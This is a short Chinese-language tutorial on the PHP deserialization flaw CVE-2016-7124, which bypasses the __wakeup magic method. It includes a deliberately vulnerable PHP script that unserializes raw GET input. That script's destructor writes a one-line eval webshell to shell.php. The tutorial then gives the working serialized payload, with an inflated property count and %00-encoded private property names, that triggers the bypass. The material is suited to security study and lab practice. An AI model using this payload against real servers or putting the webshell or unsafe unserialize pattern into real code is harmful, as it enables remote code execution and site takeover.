PHP魔术方法反序列化(CVE-2016-7124)

PHP魔术方法反序列化

PHP5小于5.6.25或PHP7小于7.0.10

_wakeup

在对象被反序列化后被调用

源码分析

<?php
// 目标：反序列化的时候绕过__wakeup以达到写文件的操作
// CVE-2016-7124
// PHP5小于5.6.25或PHP7小于7.0.10
class Test
{
    
    
    // 私有成员变量
    private $poc = '';
    public function __construct($poc)
    {
    
    
        $this->poc = $poc;
    }

    function __destruct()
    {
    
    
        if ($this->poc != '')
        {
    
    
            file_put_contents('shell.php', '<?php eval($_POST["shell"]);?>');
           die('Success!!!');
       }
        else
        {
    
    
            die('fail to getshell!!!');
        }
    }

    function __wakeup()
    {
    
    
        // 返回由对象属性组成的关联数组，把所有的属性置空
        foreach(get_object_vars($this) as $k => $v)
        {
    
    
            $this->$k = null;
        }
        echo "waking up...n";
    }
}
$poc = $_GET['poc'];
/*if(!isset($poc))
{
    show_source(__FILE__);
    die();
}*/
print_r("your payload:".$poc);
$a = unserialize($poc);
// PHP5小于5.6.25或PHP7小于7.0.10

当成员变量的数量大于本身的成员变量的数量，就会跳过_wakeup魔术方法
当销毁的时触发一个生成一句话木马文件的析构函数
满足的条件是这个类的poc成员变量不为空

但是里面的_wakeup函数将所传的成员变量的值置空

反序列化成员变量

所以现在需要绕过这个_wakeup函数执行

php-poc

我们先序列化一下该成员变量

当成员变量的数量大于本身的成员变量的数量，就会跳过_wakeup魔术方法
所以增加一个成员变量或多个成员变量
O:4:“Test”:2:{s:9:" Testpoc";s:5:“shell”;}

但是要注意的是该poc成员变量是一个私有变量，序列化后与类名进行拼接了
所以可以通过url编码空格%00进行隔开
O:4:“Test”:2:{s:9:"%00Test%00poc";s:5:“shell”;}